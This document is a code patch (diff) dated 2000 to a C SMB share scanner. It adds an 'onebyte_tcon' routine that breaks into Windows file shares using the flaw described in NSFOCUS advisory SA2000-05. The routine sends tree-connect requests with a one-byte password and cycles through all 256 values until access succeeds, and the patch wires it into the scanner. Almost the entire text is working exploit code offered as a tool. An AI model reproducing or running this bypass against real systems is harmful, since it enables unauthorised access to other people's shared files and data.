*** client.c.orig Sun Oct 15 02:28:24 2000 --- client.c Sun Oct 15 03:04:28 2000 *************** *** 2740,2745 **** --- 2740,2844 ---- return True; } /* send_tcon */ + /* Attempt to break into share as described in NSFOCUS Security + * Advisory(SA2000-05) + * -ghandi , 20001015 + */ + static BOOL onebyte_tcon (char *inbuf,char *outbuf) + { + char * pass = password; + pstring dev; + register char * p; + register int x; + int i; + int passlen = strlen(pass)+1; /* moved from inside "again2" ctx */ + fstring pword; /* moved from inside "again2" ctx */ + + #if AJT + if (strstr(service,"IPC$")) connect_as_ipc = True; + #endif + + strcpy(dev,"A:"); + if (connect_as_printer) + strcpy(dev,"LPT1:"); + if (connect_as_ipc) + strcpy(dev,"IPC"); + + /* SCANNER: should split all this into separate functions for + sessreq / dialect / sesssetupX / tcon, that all take uname/pw args. + ... hmm, above looks like pre-lanman1 didn't use sesssetup??? */ + + /* now we've got a connection - send a tcon message */ + bzero(outbuf,smb_size); + + if (strncmp(service,"\\\\",2) != 0) + { + DEBUG(0,("\nWarning: Your service name doesn't start with \\\\. This is probably incorrect.\n")); + DEBUG(0,("Perhaps try replacing each \\ with \\\\ on the command line?\n\n")); + } + + sec_mode = 0; + for (i = 0, pword[0] = 0, passlen = 1; i < 256; i++, pword[0]++) { + set_message(outbuf,4,2 + strlen(service) + passlen + strlen(dev),True); + CVAL(outbuf,smb_com) = SMBtconX; + setup_pkt(outbuf); + + SSVAL(outbuf,smb_vwv0,0xFF); + SSVAL(outbuf,smb_vwv3,passlen); + + p = smb_buf(outbuf); + memcpy(p,pword,passlen); + p += passlen; + strcpy(p,service); + p = skip_string(p,1); + strcpy(p,dev); + + send_smb(Client,outbuf); + x = receive_smb(Client,inbuf,CLIENT_TIMEOUT); + /* XXX: need some other indicator that the net's hung, so step() bails */ + if (x == 0) { /* fukt connection? */ + DEBUG(0,("tcon reply failed\n")); + return (False); + } + + if (CVAL(inbuf,smb_rcls) != 0) + { + DEBUG(2,("%s/%s: %s: %s\n", username, pass, service, smb_errstr(inbuf))); + cur_serr = interpret_serr + (CVAL (inbuf, smb_rcls), SVAL (inbuf, smb_err)); + /* this "can't happen" but does against misconfigured samba, fer example */ + if ((cur_serr == 2) && (sec_mode & 1)) + DEBUG (1,("Wanted TCon passwd in USER-mode + sec?!??!\n")); + } /* if smb_rcls err */ + else + break; + } + + /* we're in */ + DEBUG(0,("tcon %s connected as %s/%s\n", service, username, pass)); + #if 0 + /* done externally */ + if (read_pass && !(sec_mode & 1)) + exit (0); + #endif + + max_xmit = MIN(max_xmit,BUFFER_SIZE-4); + if (max_xmit <= 0) + max_xmit = BUFFER_SIZE - 4; + + cnum = SVAL(inbuf,smb_tid); + + /* could this actually happen?? */ + if (cnum == 0) { + DEBUG (0,("OOPS! opened tcon, but Tree-ID is zero?!?!\n")); + return (False); + } + DEBUG(3,("Connected with cnum=%d max_xmit=%d\n",cnum,max_xmit)); + + return True; + } /* onebyte_tcon */ + /* * stepped version of send_login, for compat with the old one */ *************** *** 3812,3824 **** #ifdef VERBOSE natprintf("[*]--- WARNING: Able to access share: %s\n", service); #endif ! phase = 6; goto phase_6; } else { #ifdef VERBOSE ! natprintf("[*]--- Unable to access\n"); #endif } /* --- 3911,3933 ---- #ifdef VERBOSE natprintf("[*]--- WARNING: Able to access share: %s\n", service); #endif ! phase = 6; goto phase_6; } else { + /* Now attempt to "one-byte" into the share by setting password + * length to 1 and trying all 256 values + * -ghandi + */ + x = onebyte_tcon(inbuf, outbuf); + if (x == 1) { #ifdef VERBOSE ! natprintf("[*]--- WARNING: Able to one-byte into share: %s\n", ! service); #endif + } + else + natprintf("[*]--- Unable to access\n"); } /*